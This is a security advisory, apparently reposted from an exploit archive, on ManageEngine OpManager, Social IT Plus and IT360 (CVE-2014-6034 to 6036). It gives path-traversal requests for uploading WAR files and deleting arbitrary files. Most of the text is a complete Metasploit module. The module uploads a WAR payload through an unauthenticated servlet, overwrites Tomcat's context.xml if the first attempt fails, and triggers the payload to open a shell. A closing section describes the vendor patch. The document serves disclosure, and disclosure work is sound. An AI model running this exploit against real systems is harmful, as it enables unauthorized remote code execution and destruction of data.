ManageEngine OpManager / Social IT Arbitrary File Upload Exploit

>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360
>> Discovered by Pedro Ribeiro ([email protected]), Agile Information Security
==========================================================================

>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation."

"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly."

"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."


>> Technical details:
#1
Vulnerability: Remote code execution via WAR file upload
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360

a)
CVE-2014-6034
POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war
Affected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; IT360 v? to v10.4
A Metasploit module that exploits this vulnerability has been released.

b)
CVE-2014-6035
POST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war
Affected versions: OpManager v? to v11.3


#2
Vulnerability: Arbitrary file deletion
CVE-2014-6036
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
Affected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 v? to v10.4

POST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini


##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.
The vulnerability exists in the FileCollector servlet which accepts unauthenticated
file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on
version 11.0 of SocialIT for Windows and Linux.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-6034' ],
[ 'OSVDB', '112276' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt'
],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 27 2014'))

register_options(
[
Opt::RPORT(80),
OptInt.new('SLEEP',
[true, 'Seconds to sleep while we wait for WAR deployment', 15]),
], self.class)
end

def check
res = send_request_cgi({
'uri' =>
normalize_uri("/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"),
'method' => 'GET'
})

# A GET request on this servlet returns "405 Method not allowed"
if res and res.code == 405
return Exploit::CheckCode::Detected
end

return Exploit::CheckCode::Safe
end


def upload_war_and_exec(try_again, app_base)
tomcat_path = '../../../tomcat/'
servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'

if try_again
# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration
# does not allow us to deploy WARs. Fix that by uploading a new context.xml file.
# The file we are uploading has the same content apart from privileged="false" and lots of XML
comments.
# After replacing the context.xml file let's upload the WAR again.
print_status("#{peer} - Replacing Tomcat context file")
send_request_cgi({
'uri' => normalize_uri(servlet_path),
'method' => 'POST',
'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context
privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},
'ctype' => 'application/xml',
'vars_get' => {
'regionID' => tomcat_path + "conf",
'FILENAME' => "context.xml"
}
})
else
# We need to create the upload directories before our first attempt to upload the WAR.
print_status("#{peer} - Creating upload directories")
bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
send_request_cgi({
'uri' => normalize_uri(servlet_path),
'method' => 'POST',
'data' => rand_text_alphanumeric(4 + rand(32 - 4)),
'ctype' => 'application/xml',
'vars_get' => {
'regionID' => "",
'FILENAME' => bogus_file
}
})
register_files_for_cleanup("state/archivedata/zip/" + bogus_file)
end

war_payload = payload.encoded_war({ :app_name => app_base }).to_s

print_status("#{peer} - Uploading WAR file...")
res = send_request_cgi({
'uri' => normalize_uri(servlet_path),
'method' => 'POST',
'data' => war_payload,
'ctype' => 'application/octet-stream',
'vars_get' => {
'regionID' => tomcat_path + "webapps",
'FILENAME' => app_base + ".war"
}
})

# The server either returns a 500 error or a 200 OK when the upload is successful.
if res and (res.code == 500 or res.code == 200)
print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
" seconds for deployment")
sleep(datastore['SLEEP'])
else
fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
end

print_status("#{peer} - Executing payload, wait for session...")
send_request_cgi({
'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
end


def exploit
app_base = rand_text_alphanumeric(4 + rand(32 - 4))

upload_war_and_exec(false, app_base)
register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")

sleep_counter = 0
while not session_created?
if sleep_counter == datastore['SLEEP']
print_error("#{peer} - Failed to get a shell, let's try one more time")
upload_war_and_exec(true, app_base)
return
end

sleep(1)
sleep_counter += 1
end
end
end


>> Fix:
Upgrade to OpManager 11.3, then install the patch in https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix
This patch can be applied to all the applications but only for the latest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).
ManageEngine have indicated that the soon to be released OpManager version 11.4 might not have the fix as the release is almost ready. They are planning to include the fix in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.

#  0day.today [2018-04-02]  #